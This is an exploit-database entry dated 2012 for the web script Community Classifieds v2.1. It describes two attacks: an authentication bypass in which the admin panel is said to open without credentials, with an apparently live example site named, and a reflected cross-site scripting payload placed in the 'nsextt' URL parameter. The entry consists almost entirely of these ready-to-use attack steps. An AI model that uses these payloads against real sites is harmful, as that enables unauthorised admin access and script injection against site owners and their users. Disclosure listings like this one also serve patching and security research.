id: 18715
date: 06/20/2012
title: Community Classifieds v2.1 Auth Bypass/XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Community Classifieds v2.1 Auth Bypass/XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.idealwebcreators.com/
#######################################################################

===[ Exploit ]===


Auth Bypass
=======================

http://SITE/Admin/
Dnt Ask Username & Password

Example:

http://classifiedsclone.com/admin/


Reflected XSS
==============


http://SITE/index.php?nsextt='"--></style></script><script>alert(1337)</script>


####################################################################### 



#  0day.today [2023-03-25]  #